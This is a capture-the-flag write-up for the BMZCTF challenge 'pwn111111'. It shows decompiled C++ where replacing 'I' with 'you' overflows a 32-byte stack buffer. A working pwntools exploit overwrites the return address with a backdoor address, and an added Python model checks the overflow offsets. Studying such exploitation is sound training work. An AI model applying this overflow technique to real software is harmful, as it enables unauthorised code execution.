[BMZCTF-pwn] 11-pwn111111
2022-07-06 10:43:00 【Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi】
There is still no remote environment, but this stack overflow does not involve libc, so that is not a big problem.
The program is hard to read. Note the replace call: it turns every I in the input into you. I tried it, and that is indeed what happens. Following along in gdb, I found that the 60-byte space is filled and overflowed once the 32-byte input has gone through the replacement, but the overflow is not very large: even counting ebp, putting in 21 I's still does not reach the length needed after replacement for the simplest ROP chain, rop(plt.puts, ret, got.puts). Looking back, there is a backdoor, so just overflow directly and write the backdoor address over the return address.
int vuln()
{
    const char *v0; // eax
    char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
    char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
    char v4[7]; // [esp+40h] [ebp-18h] BYREF
    char v5; // [esp+47h] [ebp-11h] BYREF
    char v6[7]; // [esp+48h] [ebp-10h] BYREF
    char v7[5]; // [esp+4Fh] [ebp-9h] BYREF
    printf("Tell me something about yourself: ");
    fgets(s, 32, edata);
    std::string::operator=(&input, s);
    std::allocator<char>::allocator(&v5);
    std::string::string(v4, "you", &v5);
    std::allocator<char>::allocator(v7);
    std::string::string(v6, "I", v7);
    replace((std::string *)v3); // replace every I with you
    std::string::operator=(&input, v3, v6, v4);
    std::string::~string(v3);
    std::string::~string(v6);
    std::allocator<char>::~allocator(v7);
    std::string::~string(v4);
    std::allocator<char>::~allocator(&v5);
    v0 = (const char *)std::string::c_str((std::string *)&input);
    strcpy(s, v0); // unbounded copy of the expanded string back into the 32-byte s
    return printf("So, %s\n", s);
}
from pwn import *
context(arch='i386', log_level='debug')
p = process('./pwn')
# 20 'I's expand to 60 bytes of "you", filling s up to the saved ebp;
# 'XXXX' overwrites the saved ebp and the next 4 bytes land on the return address,
# which is pointed at the backdoor function.
p.sendline(b'I'*20 + b'XXXX' + p32(0x8048f0d))
p.recv()
p.interactive()
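The claims above (20 I's line the return address up exactly, while no number of I's within the fgets limit leaves room for the 12-byte puts ROP chain) can be checked offline by modelling the replacement. The following is an added example, not code from the writeup; it assumes the stack layout read off the decompiled vuln() (s at ebp-0x3c, fgets limited to 31 characters) and uses struct instead of pwntools so it runs without the binary.

```python
import struct

# Layout assumed from the decompiled vuln() above.
FGETS_MAX = 31          # fgets(s, 32, ...) stores at most 31 characters (a trailing '\n' counts)
S_TO_SAVED_EBP = 0x3c   # char s[32] sits at ebp-0x3c, i.e. 60 bytes below the saved ebp
RET_OFFSET = S_TO_SAVED_EBP + 4   # 64: distance from s to the return address
ROP_LEN = 12            # plt.puts + ret + got.puts, the simplest chain mentioned in the writeup


def expand(user_input: bytes) -> bytes:
    """Model the program's replace(): every 'I' becomes 'you' (3 bytes for 1)."""
    return user_input.replace(b"I", b"you")


def overflow_budget(num_i: int) -> dict:
    """For num_i leading I's followed by raw bytes (within the fgets limit), report
    how many fully controlled bytes land at or after the return address."""
    raw_left = FGETS_MAX - num_i          # characters left for raw payload bytes
    if raw_left < 0:
        raise ValueError("more I's than fgets accepts")
    controlled_start = 3 * num_i          # expanded "you" prefix ends here
    controlled_end = controlled_start + raw_left
    # The return address is controllable only if the raw bytes begin at or before
    # it; bytes inside the "you" prefix are fixed text, not attacker-chosen.
    reaches_ret = controlled_start <= RET_OFFSET and controlled_end >= RET_OFFSET + 4
    past_ret = controlled_end - RET_OFFSET if reaches_ret else 0
    return {
        "reaches_ret": reaches_ret,
        "bytes_past_ret": past_ret,
        "fits_backdoor": past_ret >= 4,
        "fits_rop": past_ret >= ROP_LEN,
    }


def best_rop_budget() -> int:
    """Largest number of controlled bytes past the return address over every
    possible I count. The writeup's point is that this never reaches ROP_LEN."""
    return max(overflow_budget(n)["bytes_past_ret"] for n in range(FGETS_MAX + 1))


def writeup_payload(ret_addr: int, num_i: int = 20) -> bytes:
    """The writeup's layout: I's, 4 filler bytes for the saved ebp, then the address."""
    return b"I" * num_i + b"XXXX" + struct.pack("<I", ret_addr)


def landed_return_address(user_input: bytes):
    """Which 4 bytes end up on the return address after expansion (None if not reached)."""
    expanded = expand(user_input)
    if len(expanded) < RET_OFFSET + 4:
        return None
    return struct.unpack("<I", expanded[RET_OFFSET:RET_OFFSET + 4])[0]


if __name__ == "__main__":
    for n in (19, 20, 21, 22):
        print(n, overflow_budget(n))
    print("max bytes past ret:", best_rop_budget())
    # 0x8048f0d is the backdoor address used in the writeup's script.
    print(hex(landed_return_address(writeup_payload(0x8048f0d))))
```

With 20 I's the controlled bytes run from offset 60 to 70, so the saved ebp and the return address are both attacker-chosen but only 7 bytes lie past the return address; 21 I's gives 9, and from 22 onwards the "you" text itself covers the return address. The 12-byte chain never fits, which is why the writeup falls back to the backdoor.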